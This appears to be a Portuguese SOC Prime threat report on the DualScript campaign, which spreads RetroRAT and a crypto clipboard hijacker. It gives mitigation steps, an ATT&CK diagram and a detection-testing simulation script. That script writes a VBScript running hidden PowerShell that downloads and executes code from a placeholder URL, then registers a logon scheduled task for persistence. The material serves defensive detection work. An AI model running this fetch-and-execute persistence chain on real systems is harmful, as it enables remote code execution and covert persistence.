SOC Prime Bias: Crítico

31 Mar 2026 15:28
newspaper icon Seqrite

Operação DualScript: Malware Em PowerShell em Múltiplos Estágios Visando Criptomoedas e Finanças

Author Photo
Ruslan Mikhalov Chefe de Pesquisa de Ameaças na SOC Prime linkedin icon Seguir
Operação DualScript: Malware Em PowerShell em Múltiplos Estágios Visando Criptomoedas e Finanças
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumo

O relatório descreve a Operação DualScript, uma campanha de malware em múltiplos estágios que depende de persistência por tarefas agendadas, iniciadores VBScript e carregadores PowerShell para implantar tanto um sequestrador de área de transferência quanto o trojan de acesso remoto RetroRAT. Os atacantes armazenam o PowerShell malicioso em servidores externos e o executam totalmente na memória para reduzir as oportunidades de detecção. O RetroRAT grava as teclas digitadas, monitora janelas ativas em busca de palavras-chave relacionadas a finanças e envia dados roubados por meio de um canal customizado TCP C2. A campanha tem como alvo atividades de criptomoeda e bancos dos EUA.

Investigação

Analistas descobriram tarefas agendadas configuradas para lançar arquivos VBScript de caminhos graváveis pelo usuário, que então executavam PowerShell oculto com a política de execução desabilitada. Foram identificadas duas cadeias de entrega paralelas: uma recuperava um script Wallet.txt para sequestrar conteúdos da área de transferência de criptomoedas, enquanto a outra carregava o RetroRAT diretamente na memória. A análise estática também expôs lógica anti-análise, criação de mutex, keylogging multithread e uma string de handshake C2 embutida.

Mitigação

Defensores devem monitorar tarefas agendadas suspeitas que invoquem VBScript ou PowerShell com janelas ocultas e argumentos de bypass. A detecção em endpoints deve focar na execução de PowerShell na memória, comportamento incomum de monitoramento de área de transferência e criação de mutex desconhecidos. As organizações também devem bloquear tráfego de saída para os domínios maliciosos e aplicar controles rigorosos de execução para PowerShell e VBScript.

Resposta

Se esta atividade for detectada, isole o host afetado, desative as tarefas agendadas maliciosas e remova quaisquer artefatos de VBScript ou PowerShell persistidos. Realize uma varredura forense completa para o payload RetroRAT, dados de teclas capturadas e tráfego C2 relacionado. Redefina as informações da carteira de criptomoeda exposta e altere as credenciais bancárias. Restaure sistemas afetados a partir de backups limpos e bloqueie os domínios e endereços IP identificados na camada de rede.

"graph TB %% Class definitions classDef technique fill:#d1e8ff classDef file fill:#ffe6cc classDef malware fill:#ffcccc classDef process fill:#e2ffd6 %% Nodes u2013 Techniques tech_persistence["<b>Técnica</b> – <b>T1053 Tarefa/Trabalho Agendado</b><br/><b>Descrição</b>: Cria uma tarefa agendada do Windows que executa um iniciador VBScript em modo oculto para persistência."] class tech_persistence technique tech_execution["<b>Técnica</b> – <b>T1059.001 PowerShell</b><br/><b>Descrição</b>: Executa código PowerShell via bypass de política de execução e o executa diretamente na memória."] class tech_execution technique tech_defense["<b>Técnica</b> – <b>T1497.002 Evasão de Sandbox de Virtualização</b><br/><b>Descrição</b>: Verifica nomes de usuário de sandbox e artefatos de VM; aborta se tal ambiente for detectado."] class tech_defense technique tech_download["<b>Técnica</b> – <b>T1102 Serviço Web</b><br/><b>Descrição</b>: Recupera um payload remoto (Wallet.txt) via HTTPS e o converte para um ScriptBlock para execução em memória."] class tech_download technique tech_clipboard["<b>Técnica</b> – <b>T1115 Dados da Área de Transferência</b> e <b>T1204.004 Cópia e Colagem Maliciosa</b><br/><b>Descrição</b>: Monitora a área de transferência do sistema e substitui endereços legítimos de criptomoeda por carteiras controladas pelo atacante."] class tech_clipboard technique tech_keylog["<b>Técnica</b> – <b>T1056.001 Keylogging</b><br/><b>Descrição</b>: Instala um hook de teclado em baixo nível para capturar teclas digitadas durante sessões financeiras."] class tech_keylog technique tech_screen["<b>Técnica</b> – <b>T1113 Captura de Tela</b><br/><b>Descrição</b>: Grava capturas de tela ou transmite a área de trabalho para monitoramento visual da atividade da vítima."] class tech_screen technique tech_c2["<b>Técnica</b> – <b>T1041 Exfiltração sobre Canal C2</b><br/><b>Descrição</b>: Envia teclas, dados da área de transferência e logs coletados para um servidor C2 embutido usando um cliente TCP."] class tech_c2 technique tech_process["<b>Técnica</b> – <b>T1543 Criar ou Modificar Processo do Sistema</b><br/><b>Descrição</b>: Tarefa agendada gera um novo processo para o payload PowerShell e mais tarde cria threads adicionais para funções paralelas."] class tech_process technique tech_rdp["<b>Técnica</b> – <b>T1219.002 Software de Desktop Remoto</b><br/><b>Descrição</b>: Permite ao atacante visualizar ou controlar a área de trabalho da vítima através do componente RetroRAT."] class tech_rdp technique tech_inputinj["<b>Técnica</b> – <b>T1674 Injeção de Entrada</b><br/><b>Descrição</b>: Injeta strings de carteira controladas pelo atacante na área de transferência antes que a vítima cole o conteúdo."] class tech_inputinj technique %% Nodes u2013 Artifacts file_vbscript["<b>Arquivo</b> – <b>Nome</b>: ppamproServiceZuneWAL.vbs / PiceVid.vbs<br/><b>Finalidade</b>: Inicia o payload PowerShell em modo oculto."] class file_vbscript file malware_retro["<b>Malware</b> – <b>Nome</b>: RetroRAT<br/><b>Função</b>: Fornece capacidades de desktop remoto e execução de comandos."] class malware_retro malware %% Connections u2013 Flow tech_persistence –>|cria| file_vbscript file_vbscript –>|inicia| tech_execution tech_execution –>|usa| tech_download tech_download –>|entrega payload para| tech_process tech_process –>|gera| tech_keylog tech_process –>|gera| tech_screen tech_process –>|gera| tech_clipboard tech_clipboard –>|habilita| tech_inputinj tech_keylog –>|exfiltra via| tech_c2 tech_screen –>|exfiltra via| tech_c2 tech_clipboard –>|exfiltra via| tech_c2 tech_process –>|inicia| tech_rdp tech_rdp –>|comunica com| tech_c2 tech_rdp –>|executa| malware_retro tech_defense –>|verifica antes| file_vbscript "

Fluxo de Ataque

Execução da Simulação

Pré-requisito: O Check de Telemetria & Baseline Pre‑flight deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e o enredo DEVEM refletir diretamente os TTPs identificados e visam gerar exatamente a telemetria esperada pela lógica de detecção.

  • Narrativa do Ataque & Comandos:
    O atacante primeiro organiza um VBScript (dual.vbs) no diretório de perfil do usuário. A finalidade do script é iniciar o PowerShell com as flags -WindowStyle Hidden and -ExecutionPolicy Bypass, depois baixar e executar um payload remoto (simulado com um simples Write-Host). Para alcançar persistência, o atacante registra uma tarefa agendada (DualScriptPersist) que executa o VBScript no logon. Cada etapa produz as duas entradas correlacionadas EventID 4104 que a regra procura.

  • Script de Teste de Regressão:

    # -------------------------------------------------
# Simulação de Ataque DualScript – PowerShell
# -------------------------------------------------
# 1️⃣ Crie o VBScript malicioso em um caminho gravável pelo usuário
$vbsPath = "$env:USERPROFILEdual.vbs"
$payloadUrl = "http://example.com/payload.ps1"   # URL de exemplo
$vbsContent = @"
WScript.Sleep 500
Dim sh
Set sh = CreateObject("WScript.Shell")
sh.Run "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command `"IEX (New-Object Net.WebClient).DownloadString('$payloadUrl')`""
"@
$vbsContent | Set-Content -Path $vbsPath -Encoding ASCII

# 2️⃣ Registre uma tarefa agendada que executa o VBScript a cada logon do usuário
$taskName = "DualScriptPersist"
$taskAction = "`"$vbsPath`""
schtasks.exe /Create `
    /SC ONLOGON `
    /RL HIGHEST `
    /TN $taskName `
    /TR $taskAction `
    /F

# 3️⃣ Force a execução imediata da tarefa (dispara a detecção)
schtasks.exe /Run /TN $taskName

Write-Host "`n[+] Simulação DualScript executada. Verifique seu SIEM para alertas."
# -------------------------------------------------

  • Comandos de Limpeza:

    # -------------------------------------------------
# Limpeza da Simulação DualScript
# -------------------------------------------------
$taskName = "DualScriptPersist"
$vbsPath  = "$env:USERPROFILEdual.vbs"

# Exclua a tarefa agendada
schtasks.exe /Delete /TN $taskName /F

# Remova o arquivo VBScript
Remove-Item -Path $vbsPath -Force -ErrorAction SilentlyContinue

Write-Host "`n[+] Limpeza completa."
# -------------------------------------------------

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e gerar valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Cadastre-se Gratuitamente